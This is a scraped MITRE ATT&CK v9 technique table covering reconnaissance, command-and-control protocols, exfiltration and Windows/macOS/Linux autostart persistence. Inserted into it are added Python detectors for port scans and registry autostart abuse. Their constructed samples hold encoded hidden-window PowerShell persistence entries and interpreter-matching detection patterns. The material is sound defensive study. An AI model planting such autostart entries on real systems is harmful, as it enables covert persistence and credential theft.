A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control (<a href="/versions/v9/techniques/T1102">Web Service</a>) or <a href="/versions/v9/techniques/T1567">Exfiltration Over Web Service</a>. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1595"> T1595 </a> </td> <td> <a href="/versions/v9/techniques/T1595"> Active Scanning </a> </td> <td> Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1595/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1595/001"> Scanning IP Blocks </a> </td> <td> Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1595/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1595/002"> Vulnerability Scanning </a> </td> <td> Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use. 
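Active scanning leaves a distinctive shape in flow or firewall logs: one source reaching many hosts on one port, or many ports on one host, within a short window. The following detector is an added example for this page, not ATT&CK code; the log format, thresholds and records are all constructed, and the thresholds should be tuned for the network being monitored.

```python
"""Flag active scanning (T1595) in firewall/flow records.

Added example; not MITRE or ATT&CK code. Records are constructed in a simple
"epoch src dst dport proto action" format (not any vendor's schema). For each
source the detector slides a time window over its connections and reports a
horizontal scan (one source touching many hosts) or a vertical scan (one source
touching many ports on one host); the share of denied connections in the window
is included as corroboration. Thresholds are assumed and should be tuned.
"""
from collections import Counter, defaultdict, deque

WINDOW_SECONDS = 60
HORIZONTAL_HOSTS = 10   # distinct destination hosts within the window
VERTICAL_PORTS = 15     # distinct destination ports on one host within the window


def parse_record(line):
    ts, src, dst, dport, proto, action = line.split()
    return {"ts": int(ts), "src": src, "dst": dst, "dport": int(dport),
            "proto": proto, "action": action}


def detect_scans(lines, window=WINDOW_SECONDS, h_thresh=HORIZONTAL_HOSTS,
                 v_thresh=VERTICAL_PORTS):
    by_src = defaultdict(list)
    for line in lines:
        if line.strip() and not line.startswith("#"):
            rec = parse_record(line)
            by_src[rec["src"]].append(rec)

    findings, reported = [], set()
    for src, recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        win = deque()                    # records inside the current window
        hosts = Counter()                # dst -> records in window
        ports = defaultdict(Counter)     # dst -> dport -> records in window
        for rec in recs:
            win.append(rec)
            hosts[rec["dst"]] += 1
            ports[rec["dst"]][rec["dport"]] += 1
            while rec["ts"] - win[0]["ts"] > window:   # expire old records
                old = win.popleft()
                hosts[old["dst"]] -= 1
                if hosts[old["dst"]] == 0:
                    del hosts[old["dst"]]
                ports[old["dst"]][old["dport"]] -= 1
                if ports[old["dst"]][old["dport"]] == 0:
                    del ports[old["dst"]][old["dport"]]
            denied = sum(1 for r in win if r["action"] == "deny") / len(win)
            if len(hosts) >= h_thresh and ("horizontal", src) not in reported:
                reported.add(("horizontal", src))
                findings.append({"src": src, "kind": "horizontal", "hosts": len(hosts),
                                 "ports": sorted({r["dport"] for r in win}),
                                 "denied_share": round(denied, 2), "at": rec["ts"]})
            for dst, per_port in ports.items():
                if len(per_port) >= v_thresh and ("vertical", src, dst) not in reported:
                    reported.add(("vertical", src, dst))
                    findings.append({"src": src, "kind": "vertical", "dst": dst,
                                     "ports": len(per_port),
                                     "denied_share": round(denied, 2), "at": rec["ts"]})
    return findings


# Constructed flow log, not real data: a benign client, a host sweep on 445,
# and a port sweep against one server.
SAMPLE_LOG = ["# epoch src dst dport proto action"]
SAMPLE_LOG += [f"{1700000000 + i * 10} 10.1.1.5 10.1.2.10 443 tcp allow"
               for i in range(20)]
SAMPLE_LOG += [f"{1700000100 + i} 203.0.113.7 10.1.2.{i + 1} 445 tcp deny"
               for i in range(30)]
SAMPLE_LOG += [f"{1700000200 + i} 198.51.100.9 10.1.2.10 {p} tcp deny"
               for i, p in enumerate(range(20, 60))]

if __name__ == "__main__":
    for finding in detect_scans(SAMPLE_LOG):
        print(finding)
```

A slow scanner that spaces probes beyond the window, or one that spreads them across many source addresses, will stay under these thresholds; widening the window and aggregating by source network are the usual next steps.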
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1071"> T1071 </a> </td> <td> <a href="/versions/v9/techniques/T1071"> Application Layer Protocol </a> </td> <td> Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1071/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1071/001"> Web Protocols </a> </td> <td> Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1071/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1071/002"> File Transfer Protocols </a> </td> <td> Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1071/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1071/003"> Mail Protocols </a> </td> <td> Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. 
Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1071/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1071/004"> DNS </a> </td> <td> Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1010"> T1010 </a> </td> <td> <a href="/versions/v9/techniques/T1010"> Application Window Discovery </a> </td> <td> Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1560"> T1560 </a> </td> <td> <a href="/versions/v9/techniques/T1560"> Archive Collected Data </a> </td> <td> An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1560/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1560/001"> Archive via Utility </a> </td> <td> An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip, WinRAR, and WinZip. 
Most utilities include functionality to encrypt and/or compress data. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1560/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1560/002"> Archive via Library </a> </td> <td> An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including <a href="/versions/v9/techniques/T1059/006">Python</a> rarfile, libzip, and zlib. Most libraries include functionality to encrypt and/or compress data. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1560/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1560/003"> Archive via Custom Method </a> </td> <td> An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1123"> T1123 </a> </td> <td> <a href="/versions/v9/techniques/T1123"> Audio Capture </a> </td> <td> An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening in on sensitive conversations to gather information. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1119"> T1119 </a> </td> <td> <a href="/versions/v9/techniques/T1119"> Automated Collection </a> </td> <td> Once established within a system or network, an adversary may use automated techniques for collecting internal data. 
Methods for performing this technique could include use of a <a href="/versions/v9/techniques/T1059">Command and Scripting Interpreter</a> to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1020"> T1020 </a> </td> <td> <a href="/versions/v9/techniques/T1020"> Automated Exfiltration </a> </td> <td> Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1020/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1020/001"> Traffic Duplication </a> </td> <td> Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature of some network devices, used for network analysis, that can be configured to duplicate traffic and forward it to one or more destinations for analysis by a network analyzer or other monitoring device. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1197"> T1197 </a> </td> <td> <a href="/versions/v9/techniques/T1197"> BITS Jobs </a> </td> <td> Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through <a href="/versions/v9/techniques/T1559/001">Component Object Model</a> (COM). BITS is commonly used by updaters, messengers, and other applications that prefer to operate in the background (using available idle bandwidth) without interrupting other networked applications. 
File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1547"> T1547 </a> </td> <td> <a href="/versions/v9/techniques/T1547"> Boot or Logon Autostart Execution </a> </td> <td> Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1547/001"> Registry Run Keys / Startup Folder </a> </td> <td> Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1547/002"> Authentication Package </a> </td> <td> Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. 
They provide support for multiple logon processes and multiple security protocols to the operating system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1547/003"> Time Providers </a> </td> <td> Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1547/004"> Winlogon Helper DLL </a> </td> <td> Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1547/005"> Security Support Provider </a> </td> <td> Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. 
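Several of the autostart locations above (the Run keys of .001, the LSA Authentication Packages of .002 and the Security Packages of .005) can be reviewed from a single <code>reg.exe export</code>. The following triage script is an added example, not MITRE code: it parses the .reg text format, compares the LSA package lists to a baseline that is assumed here and should be taken from a known-good host of the same build, and flags Run-key commands that invoke a script interpreter with a hidden window or an encoded command. The dump it reads is constructed.

```python
"""Triage a reg.exe export for autostart persistence (T1547.001/.002/.005).

Added example; not MITRE or ATT&CK code. Parses the .reg text format ([key]
headers, "name"="string" values with \\ and \" escapes, hex(7): REG_MULTI_SZ
values as comma-separated UTF-16LE bytes wrapped across lines with a trailing
backslash), then flags Run-key commands that launch a script interpreter with
a hidden window or encoded command, and LSA package lists with entries outside
a baseline. The baseline is an assumption; the dump below is constructed.
"""
import re

RUN_KEY_SUFFIXES = (r"\Microsoft\Windows\CurrentVersion\Run",
                    r"\Microsoft\Windows\CurrentVersion\RunOnce")
LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
LSA_BASELINE = {  # assumed, illustrative only; take from a known-good host
    "Authentication Packages": {"msv1_0"},
    "Security Packages": {"kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u"},
}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
HIDDEN_OR_ENCODED = re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+\S|-nop\b)")


def decode_value(data):
    """Decode the right-hand side of a .reg value line (string or multi-sz)."""
    if data.startswith('"') and data.endswith('"'):
        return re.sub(r'\\(["\\])', r"\1", data[1:-1])
    if data.startswith("hex(7):"):
        raw = bytes(int(h, 16) for h in data[7:].split(",") if h)
        return [s for s in raw.decode("utf-16-le").split("\x00") if s]
    return data  # other types left undecoded


def parse_reg(text):
    """Return {key_path: {value_name: decoded_value}}."""
    keys, current, lines, i = {}, None, text.splitlines(), 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith((";", "Windows Registry Editor")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        while line.endswith("\\"):  # hex data continues on the next line
            line = line[:-1] + lines[i].strip()
            i += 1
        name, _, data = line.partition("=")
        keys[current]["(Default)" if name == "@" else name.strip('"')] = decode_value(data)
    return keys


def exe_name(cmd):
    """Program a Run-key command launches: its first quoted or bare token."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmd)
    exe = (m.group(1) or m.group(2)) if m else cmd
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(reg):
    findings = []
    for key, values in reg.items():
        if key.endswith(RUN_KEY_SUFFIXES):
            for name, cmd in values.items():
                if not isinstance(cmd, str):
                    continue
                reasons = []
                if exe_name(cmd) in INTERPRETERS:
                    reasons.append("interpreter:" + exe_name(cmd))
                if HIDDEN_OR_ENCODED.search(cmd):
                    reasons.append("hidden window or encoded command")
                if reasons:
                    findings.append({"key": key, "value": name, "reasons": reasons})
        elif key == LSA_KEY:
            for vname, baseline in LSA_BASELINE.items():
                extra = [p for p in values.get(vname, []) if p.lower() not in baseline]
                if extra:
                    findings.append({"key": key, "value": vname,
                                     "reasons": ["non-baseline package: " + ", ".join(extra)]})
    return findings


# Constructed sample dump; the helpers reproduce the layout reg.exe writes.
def multi_sz_hex(values):
    raw = ("".join(v + "\x00" for v in values) + "\x00").encode("utf-16-le")
    return "hex(7):" + ",".join(f"{b:02x}" for b in raw)


def wrap_reg(line, width=78):
    """Break a long value after a comma with a trailing backslash, as reg.exe does."""
    out = []
    while len(line) > width and line.rfind(",", 0, width) > 0:
        cut = line.rfind(",", 0, width) + 1
        out.append(line[:cut] + "\\")
        line = "  " + line[cut:]
    out.append(line)
    return "\n".join(out)


SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"',
    r'"Updater"="powershell.exe -w hidden -enc QQBCAEMA"',
    "",
    "[" + LSA_KEY + "]",
    wrap_reg('"Authentication Packages"=' + multi_sz_hex(["msv1_0"])),
    wrap_reg('"Security Packages"=' + multi_sz_hex(
        ["kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u", "updsvc"])),
])
```

<code>triage(parse_reg(SAMPLE_REG))</code> returns the two findings (the encoded PowerShell Run entry and the extra Security Packages name); a real run exports <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa</code> and the HKLM/HKCU Run keys and feeds the text to the same functions. Package names matter because an SSP DLL named in Security Packages is loaded into LSASS and sees cleartext credentials, as the .005 entry describes.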
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1547/006"> Kernel Modules and Extensions </a> </td> <td> Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded into and unloaded from the kernel on demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1547/007"> Re-opened Applications </a> </td> <td> Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well, located at <code>~/Library/Preferences/com.apple.loginwindow.plist</code> and <code>~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1547/008"> LSASS Driver </a> </td> <td> Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. 
The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/009"> .009 </a> </td> <td> <a href="/versions/v9/techniques/T1547/009"> Shortcut Modification </a> </td> <td> Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/010"> .010 </a> </td> <td> <a href="/versions/v9/techniques/T1547/010"> Port Monitors </a> </td> <td> Adversaries may use port monitors to run an attacker-supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup. This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM-level permissions. Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/011"> .011 </a> </td> <td> <a href="/versions/v9/techniques/T1547/011"> Plist Modification </a> </td> <td> Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X use to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by &lt; &gt;. 
They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user's privileges). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/012"> .012 </a> </td> <td> <a href="/versions/v9/techniques/T1547/012"> Print Processors </a> </td> <td> Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/013"> .013 </a> </td> <td> <a href="/versions/v9/techniques/T1547/013"> XDG Autostart Entries </a> </td> <td> Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the <code>/etc/xdg/autostart</code> or <code>~/.config/autostart</code> directories and have a .desktop file extension. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/014"> .014 </a> </td> <td> <a href="/versions/v9/techniques/T1547/014"> Active Setup </a> </td> <td> Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer. 
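The Winlogon (.004), Security Support Provider (.005), Port Monitors (.010), Print Processors (.012) and Active Setup (.014) sub-techniques above all reduce to a Registry value that names a DLL or program which a privileged process will load at boot or logon. The Python script below is an added example, not part of the ATT&amp;CK page: it parses a <code>reg export</code> dump and compares those values against an allow-list. The dump, the allow-list and every DLL or program name in them are constructed for illustration; a real baseline should be taken from a known-good image of the same Windows build.

```python
"""Audit a reg.exe export for the autostart values behind T1547.004/.005/.010/.012/.014.
Added example; the dump and the allow-list below are constructed, not MITRE content."""
import re
from collections import defaultdict

# Constructed .reg text (not a real host). reg.exe doubles backslashes inside strings,
# continues long hex values with a trailing '\', and writes REG_MULTI_SZ as hex(7):
# UTF-16LE strings separated by NUL and terminated by a double NUL.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Users\\Public\\update.exe,"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Security Packages"=hex(7):6b,00,65,00,72,00,62,00,65,00,72,00,6f,00,73,00,00,00,\
  6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,74,00,65,00,73,00,74,00,73,00,73,00,\
  70,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Example Monitor]
"Driver"="C:\\Windows\\System32\\exmon.dll"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\winprint]
"Driver"="winprint.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{00000000-1111-2222-3333-444444444444}]
"StubPath"="powershell.exe -w hidden -enc QQBBAEEAQQA="
'''

HKLM = 'HKEY_LOCAL_MACHINE'
WINLOGON = HKLM + r'\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
LSA = HKLM + r'\SYSTEM\CurrentControlSet\Control\Lsa'
MONITORS = HKLM + r'\SYSTEM\CurrentControlSet\Control\Print\Monitors'
PRINT_PROCS = HKLM + r'\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors'
ACTIVE_SETUP = HKLM + r'\SOFTWARE\Microsoft\Active Setup\Installed Components'

# Illustrative allow-list (assumption): build the real one from a known-good image.
BASELINE = {
    'shell': {'explorer.exe'},
    'userinit': {r'c:\windows\system32\userinit.exe'},
    'security_packages': {'kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap'},
    'port_monitors': {'localspl.dll', 'usbmon.dll', 'tcpmon.dll', 'wsdmon.dll', 'appmon.dll'},
    'print_processors': {'winprint.dll'},
}
INTERPRETER = re.compile(r'(?i)\b(powershell|pwsh|cmd|wscript|cscript|mshta)(\.exe)?\b')


def decode_value(raw):
    """Decode one .reg value: quoted REG_SZ, dword:, or hex(7) REG_MULTI_SZ."""
    raw = raw.strip()
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    if raw.startswith('hex(7):'):
        data = bytes(int(h, 16) for h in re.findall(r'[0-9a-fA-F]{2}', raw[7:]))
        return [s for s in data.decode('utf-16-le').split('\x00') if s]
    if raw.startswith('dword:'):
        return int(raw[6:], 16)
    return raw


def parse_reg(text):
    """Return {key_path: {value_name: value}} from .reg export text."""
    keys, current, lines, i = defaultdict(dict), None, text.splitlines(), 0
    while i < len(lines):
        line = lines[i].strip()
        while line.endswith('\\') and i + 1 < len(lines):  # rejoin continued hex
            i += 1
            line = line[:-1] + lines[i].strip()
        i += 1
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
        elif current is not None and line.startswith('"'):
            name, sep, raw = line.partition('"=')
            if sep:
                keys[current][name[1:]] = decode_value(raw)
    return keys


def audit(reg_text):
    """List values that deviate from BASELINE or hand control to an interpreter."""
    keys, findings = parse_reg(reg_text), []

    def flag(tech, key, detail):
        findings.append({'technique': tech, 'key': key, 'detail': detail})

    wl = keys.get(WINLOGON, {})
    for name in ('Shell', 'Userinit'):  # both are comma-separated program lists
        for entry in str(wl.get(name, '')).split(','):
            if entry.strip() and entry.strip().lower() not in BASELINE[name.lower()]:
                flag('T1547.004', WINLOGON, f'{name} runs {entry.strip()}')
    pkgs = keys.get(LSA, {}).get('Security Packages', [])
    for pkg in (pkgs if isinstance(pkgs, list) else [pkgs]):
        if pkg and pkg.lower() not in BASELINE['security_packages']:
            flag('T1547.005', LSA, f'unexpected SSP {pkg} will load into lsass.exe')
    for key, values in keys.items():
        dll = str(values.get('Driver', '')).rsplit('\\', 1)[-1].lower()
        if dll and key.startswith(MONITORS + '\\') and dll not in BASELINE['port_monitors']:
            flag('T1547.010', key, f'port monitor {values["Driver"]} will load into spoolsv.exe')
        if dll and key.startswith(PRINT_PROCS + '\\') and dll not in BASELINE['print_processors']:
            flag('T1547.012', key, f'print processor {values["Driver"]} will load into spoolsv.exe')
        stub = str(values.get('StubPath', ''))
        if key.startswith(ACTIVE_SETUP + '\\') and INTERPRETER.search(stub):
            flag('T1547.014', key, f'StubPath runs an interpreter at next logon: {stub}')
    return findings


if __name__ == '__main__':
    for f in audit(SAMPLE_REG):
        print(f"{f['technique']}  {f['key']}\n    {f['detail']}")
```

Run as-is it reports the four deviations planted in the sample; for a live host, export the keys with <code>reg export</code> and read the file with <code>encoding='utf-16'</code>, since reg.exe writes UTF-16LE. The REG_MULTI_SZ handling is the part worth keeping: <code>Security Packages</code> is exported as UTF-16LE hex, so a plain text search for a DLL name in the dump will not find an added SSP.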
These programs will be executed under the context of the user and will have the account's associated permissions level. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1037"> T1037 </a> </td> <td> <a href="/versions/v9/techniques/T1037"> Boot or Logon Initialization Scripts </a> </td> <td> Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1037/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1037/001"> Logon Script (Windows) </a> </td> <td> Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system. This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1037/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1037/002"> Logon Script (Mac) </a> </td> <td> Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike <a href="/versions/v9/techniques/T1037/005">Startup Items</a>, a login hook executes as the elevated root user. 
